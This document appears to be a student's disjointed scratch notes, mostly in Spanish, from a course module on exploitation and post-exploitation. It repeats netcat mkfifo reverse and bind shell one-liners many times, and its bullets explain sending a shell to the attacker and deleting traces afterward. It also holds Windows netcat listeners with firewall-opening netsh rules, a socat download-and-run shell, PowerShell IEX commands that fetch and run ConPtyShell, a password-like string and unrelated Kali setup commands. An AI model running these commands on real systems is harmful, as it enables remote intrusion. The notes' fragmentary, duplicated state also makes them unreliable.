75 exploit/windows/fileformat/acdsee_fotoslate_string 2011-09-12
good No ACDSee FotoSlate PLP File id Parameter Overflow
rm –f /tmp/f; mkfifo /tmp/f
rm –f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f;
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f;
nc –nv [Link] 6996
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996 >/tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996 >/tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [ip objetivo] 6996 > /tmp/f
sudo cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 6996> /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 6996 > /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 21> /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f
nc
K4l1$1973
nc –nv [Link] 21
cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 8787> /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 4444> /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 514> /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 514> /tmp/f
nc –lvpn [Link] 6996
XXXXXXXXXXXXXXXXXXXXX
cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f
nc -nv [Link] 521
cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 514> /tmp/f
XXXXXXXXXXXXXXXXXXXXXXXXXXX
apt-get install nc
•
rm –f /tmp/f; mkfifo /tmp/f
• se ejecuta un /bin/sh en el lado de la máquina objetivo y se transmite una shell
al atacante:
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f
• Para realizar la conexión con la máquina objetivo se debe ejecutar desde una
terminal de la máquina atacante el siguiente comando:
nc –nv [Link] 6996
• Finalmente no se debe olvidar borrar el archivo creado inicialmente en la máquina
objetivo:
rm –f /tmp/f
cat /tmp/f|/bin/sh -i 2>&1|nc [Link] 6996 >/tmp/f
C:\Windows\System32\[Link] –Ldp 31338 –vv –e [Link]
xxxxxxxxxxxxxxxxxxxx
vmware:
[Link]
xxxxxxxxxxxxxxxxxx
LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
xxxxxxxxxxxxxxxxxxx
cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f
nc -nv [Link] 521
cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f
XXXXXXXXXXXXXXXXXXXXXXXXXXX
apt-get install nc
•
rm –f /tmp/f; mkfifo /tmp/f
• se ejecuta un /bin/sh en el lado de la máquina objetivo y se transmite una shell
al atacante:
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f
• Para realizar la conexión con la máquina objetivo se debe ejecutar desde una
terminal de la máquina atacante el siguiente comando:
nc –nv [Link] 6996
• Finalmente no se debe olvidar borrar el archivo creado inicialmente en la máquina
objetivo:
rm –f /tmp/f
C:\Windows\System32\[Link] –Ldp 31338 –vv –e [Link]
netsh firewall show opmode
netsh firewall add portopening TCP 31338 ”Prueba Netcat” ENABLE ALL
netsh advfirewall firewall add rule name=“Servicio Netcat” protocol=tcp
LocalPort=31338 dir=in enable=yes action=allow profile=Private
K4l1$1973
XXXXXXXXXXXXXXXXXXXXXX
git clone [Link]
rm –SSHPry2.0 /root/SSHPry2.0
[Link]
python [Link] --list
cd SSHPry2.0/
sudo /etc/init.d/ssh start
tail -f [Link]
chmod +x [Link]
git clone [Link]
xxxxxxxxxxxxxxxxxx
uname -v
SHA256sum
649d35f610205828a08c86d862dc6e660dced6553e55f62acf59d57643c5031f
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
exit
passwd
sudo passwd root
sudo adduser gesmass
pwd
/home/kali
ls
gesmass kali
cd home/kali
sudo usermod -aG sudo gesmass
sudo apt-get install terminator
terminator
sudo apt-get install git
sudo apt-get install python3-pip
sudo pip install
ls
code_1.67.1-1651841865_amd64.deb
sudo apt install geany
geany
sudo apt install -y htop
htop
sudo apt install neofetch
neofetch
┌──(kali㉿kali)-[~/Downloads]
└─$ ls
code_1.67.1-1651841865_amd64.deb nordvpn-release_1.0.0_all.deb
sudo apt-get install ./nordvpn-release_1.0.0_all.deb
sudo apt-get update
sudo apt-get install nordvpn -y
sudo nordvpn settings
kali-tweaks
XXXXXXXXXXXXXXXXXXXXX
nc -lnvp 6996
stty raw -echo; (stty size; cat) | nc -lvnp 87
ConPtyShell [direccion de ip] [puerto]
user@victim$ wget -q
[Link]
-O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -
li',pty,stderr,setsid,sigint,sane tcp:[Link]:4242
IEX(IWR [Link]
ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [Link] 87
cherrytree
sudo apt install ./code_1.67.1-1651841865_amd64.deb
M3A5. Explotación y Post-explotación de Vulnerabilidades
[Link]
utm_content=DAFA6Q5eLkY&utm_campaign=designshare&utm_medium=link2&utm_source=shareb
utton